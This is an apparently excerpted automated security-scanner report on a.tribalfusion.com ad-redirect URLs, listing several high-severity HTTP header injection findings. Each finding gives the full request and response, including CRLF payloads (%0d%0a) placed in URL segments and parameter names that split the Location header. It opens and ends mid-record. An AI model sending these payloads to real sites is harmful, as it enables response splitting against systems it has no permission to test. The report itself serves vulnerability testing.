Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=annFNfoZdUQMo2HpivbwkXqrnTC3Gq4ZamyyXMNuQ5tpx4qkEqfbRrjjSdPNrBJTcUkZaZbfXx2aKlrIsUwBiFxVnWqtR1BUNFc109MAN5UxU7cik5WAjeajoV6F5D8yNswhqCd0j5AJcfQPB9oPXqfZcAqlKyrSZdNZdqVN0GeGG1mnmxdZaCyfIWG4u4vHZcvTyFdnGocxbW98c7xrVkIT71ESOa599qlUM0MVlGAAkV0iw1qCrwbsAlxlN5neGdydMBFHQpGefVxuZaMkal3YBuBBujHnmccCxp6NSXVhUNs60b1Zauc1EcPpcHJeM3e2Ws14nKYTcncsKh8IFwbdcZcFdF6oZapYTIhf7yy6lxPytJShdrPm7bK3jtkwUaZaRaSiMTcG9CvcmTu2Exo3VWpgMAcyvW39AIaHdi3mXpZb5BfecTFMkSylJtg8fsCx9PpyYTKCcYQn4fVYFZb9HSyoQpMngmEQARRrTQ5DACnmUk5HkV4kwI9TACYmfXQxaDi8bCsrxmwBJrsFCwkg8owqwLwWigScYSsUqiSWZau3Jxh1WhIo4BvsWiPZacwQ20JUUdnsvMiGkuFPOs; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:52 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/f77aa
016a8b52948/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload 7c87b%0d%0abd5f277a4d9 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/7c87b%0d%0abd5f277a4d9/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aInFNfqkaHN7yktiZbuq4AsWQBQRavoZcRvIv2OLW1VHU4J3BbZbCT6ZbEuUQ7xoiCiUZclBfALPttFWXk9OBXeqbMy1VVEZdagfZdL8Wx7NR4XJhcuwVOpYxDjcHZbBx9ZcZbloWiaZbLhFwFuOZbWsMpY9EBA2PmhvyO5ZasmRCcPLvcL2SZbDMPu9t0TNBXPPqG0YW4n2pVxlvD14gSQoMnZdZbPcWiouFd6TuJP2sWpkS5Ieg772piDqsUqSlJ6LGxgUZdXa2rwL6kxiLgANjZaudyMmFur2s35pRGpQqQjRQwS5q5tS27wuVcct9BWBB2ITs03IueudAfqFMckwdnrlXrOPLFSelZdAYsrZaqdPePJODawVJ46Ef0mrnDr4DM3Um3O6tZaQbtCZcFff2bPvBKhvPnZdwVpwJPFZbdExaZbhlUZdNdUUZauIhScB3UL1eyYNAnESj3oevWes31BuWhmUuFVt0qUmsvscXbV7gQCXt08ieTnAnWBRjSIRP8UZao19fg4ZcMJknZbcrTZdZdsmTIodNBeLSavd08NWXt3VBQTr7O2rBT5hN5wsgxq06ZbXWQ9Jt4s0ZdfyNWsftJYPeqs3jF; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:40:06 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/7c87b
bd5f277a4d9/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 8 is copied into the Location response header. The payload f3ce9%0d%0ae73052eb8f6 was submitted in the REST URL parameter 8. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/f3ce9%0d%0ae73052eb8f6/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=abnFNfxlqLrQJVs5UtnNv2S7fgrHZbVACiZbPOZcIPxhPW3ZbA6tFGSbQg5rqF5bTeFsGxgxm7WWZcYXKWPrT6MSdQlpbkbGW0BZaJ40U7Re3fjbAfsPnGjGGkNZcid55ky1MN2qyAZdjeEvZccP9JsycZbOGKqC8OE9Y3CNvB4ZcdLObUsMTrcq3puuCHX6Zdt7K4YZcZbvmD9ZauPGpbonIOUgX581BnZcflisZbZdXZaVxU5goJZbLDZcZbgvZdcWLORta93sF7CDCDZcPVCR9e90kWni2qiZaIIELjSpMcYVs1gSoYs5gG03yGP1BHlTb8gCS5FGYTwQwui2ODreKyQVq4P6QZapWdG9BPhMIK2I4GqUk9XuKMOfTVba9rZbTVaMFxhtAXVeT4GSmnTDZbdrvXWBuhAL0RWaxOpsptVSfUZbM2QjN7BUajL6KQF0DnK3MWVuxRytE9o4UuNYuKuXT6qg9IUKtW6snU9sogrc6Zb836jnRoZaEoAv2VapZdyYLFkHjiP8nH3XZbtbcByRGg9OCY1MswVdKDeoWl0OaAuXsuxPFJExVrmQxh0SU1upw300TUNebVo3KrRYpCZbS6BwlJoFkZa; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:40:31 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/f3ce9
e73052eb8f6/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 9 is copied into the Location response header. The payload f5d0b%0d%0a1a3f5dc4f2b was submitted in the REST URL parameter 9. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/f5d0b%0d%0a1a3f5dc4f2b/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=a5nFNfsjyDtPTFMlFYNZdZaoWpfmPd3NG6PavZc0Zd5wLKPMfkZdtjgTqbQwcqUsPeA7t0YeymfxU8CtwZcdtPT0ObEUq9NvkEwSZcJZcnMSk60wQIduNAxSJZcAlgQgBpslZdhYqZbAvHX3kDusL4V7Gq66PAZdqfclUS10Cfps8EKxkePBMZb1tFFuNmsZdImHnWGB1ZdrGtc1kmR5Vdp77qaOZdYCtMqZanCjWqpY3cURytTFZdKTfyxYJW5DSRcTglhw9UlK6lMcIrxEJX5FykTykZbU1ZdxMMyZaStRa1msRJ4YIwpqZbRWTAdrSFGEjStfBI6BqfuyrKN3Za16pTp4XZaS6euW5TDT50aKJpYAaJGmugIMlCyaYiacnvnrrUnNSI4WyLX6OYmdpfjaZb3PVIjHK8OYQSZdxm4XPVfNJjZb7lv7V5SQBZbwAI5qnSpicZcpM0IOTpwX9q71voH5nXV87QmIsHJMAAqmRGJ98UZd2BTZbS9ygr9aw0coX1e0besbay86tTgPIdnjqndHSrbBtWqLEgIL6mVoJqTPVWHZbUTWJ44sbXWYWpwaZdOyxMA3qnPHbN401BfykA3wQjRgjPSfx; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:40:45 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/f5d0b
1a3f5dc4f2b/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of the http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.10;abr request parameter is copied into the Location response header. The payload 71cde%0d%0a25f834d5cf9 was submitted in the http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.10;abr parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.10;abr=71cde%0d%0a25f834d5cf9 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aunFNfwl6hxFQQwgQRqLFFYBjC5b3j7mFBV1KjPYS435bOHFFiXABn5UZaAwPAvfUxvZdIqQ2HKWTfchvCIvodZaRvacSIdwIIKHPTR5JXIAKKL8QtAv4I0RXZdcK4h259MZcagZdwQuChxZc0SZbuMD6VZcjmMCgeRU5wOwR0oJuspTo350EaONhaGFv6rUncjMlf4WntUunWglniZdsB0nODOAw4Qtbbm6PZbZccp3spK3kaellIAR4ipntw9MZcqkF5mg4nRAbWmdJGimiIT8XPZdINfssI0A2V5CvPJZbNXlV1XCr19O74dKUb75lZbyE7Q0AfvKTyFvBSpH06hBIM1EtXZbGDvfZb7sTHy96SunZcNc9UbeFcT6x2GfEMj9XV8ECMHGnqqHSadfZcXqExGYlw3TOnoS444qjgjem67yYAVtftZcvXS1HQBo5HqreZcurb9IyFTZbMYk5OcqjgCYZaAqKdObbKVSZcqjmrwTpP40pTYTCb3UqVe0xZcq7paL2BnY3urGg73ZcxVLdMrjDvbRjcKWIyDt3pQE33DE80bZbiQqbLmJCVUn53pXbTPVMBZdWVXVlbJY4JfsLbhJZaThob; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:00 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.10;abr=71cde
25f834d5cf9
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 371c1%0d%0a2b1e54be015 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?371c1%0d%0a2b1e54be015=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=ainFNft3erwAAxv5ACp5UsSCfRTc3eDBInYZcpZb3e5X4lJZbZccXrwtmyRG7kpCXcbsRZbGZaPluq1EQgsFonmUxHjInHpCZbTV0D0cuoC87mJvCGvo6OCJkJNZcx9bpmZd5pAy4XjDerDeZdcovmbZd0QIZaF4qLleJW0KsHR9wKZcgKZbSmv1mV6GVKInZbhXnpqN81ffmroxZbqSWs9nJEos0ZdXVOtNkvuaVur4x1j2YCFHeVo8MSvZbFNuRRZcYjxCP6EdlbZdBHB9Zd7flCLM4AK93BbLLucn2KpVU1RoSJI2f8cTZbxUVRpd3WcdiCCslLri2JjHmXZc9JwedwDN4ZdoYk4HdsGrxU67Ai2afob6T9FkHLprUjZcUYpPqvrrlSeWGX7QEO5PthmbtUJTc6AiMoGNtWGUBsEUHf2AgQbkfUuNGJZdJhaj2FrFXZbDZb3J8ZdMt1Za0AZaC15kn3burc6YPZaqlixRbqnGZcDfA3rUAXLTFBRxGQhXBkNPfoFiaE5M8IwSNv8a6bQqHxoyprRtDVKhu5VMGctmaUZb0WTQPcJy0tbZcRuZdc0acMNffRScQpGqLBqXTETZamHO0MqruForL; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:04 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?371c1
2b1e54be015=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/afmM7iPPQoUdMVUrb03F2nVaYqWEB7STJZcRcbJRr6qRWUbWGbQ4rTuoWqq0qmv4WQBQVvZd2AQHotisUtF70bnkYFYfXaapPUnZbTrJXTtQ3nbQnQUfmYqYy5TJd4TYXnaJC1r38TW7TomUJmcQnmHfoogm1wx/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload d8fab%0d%0a8e4140adc6 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/afmM7iPPQoUdMVUrb03F2nVaYqWEB7STJZcRcbJRr6qRWUbWGbQ4rTuoWqq0qmv4WQBQVvZd2AQHotisUtF70bnkYFYfXaapPUnZbTrJXTtQ3nbQnQUfmYqYy5TJd4TYXnaJC1r38TW7TomUJmcQnmHfoogm1wx/?d8fab%0d%0a8e4140adc6=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Location: ?d8fab
8e4140adc6=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/afmM7iPPQoUdMVUrb03F2nVaYqWEB7STJZcRcbJRr6qRWUbWGbQ4rTuoWqq0qmv4WQBQVvZd2AQHotisUtF70bnkYFYfXaapPUnZbTrJXTtQ3nbQnQUfmYqYy5TJd4TYXnaJC1r38TW7TomUJmcQnmHfoogm1wx/http:/www.reachout.com/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload a4cac%0d%0a09ac87d2afa was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

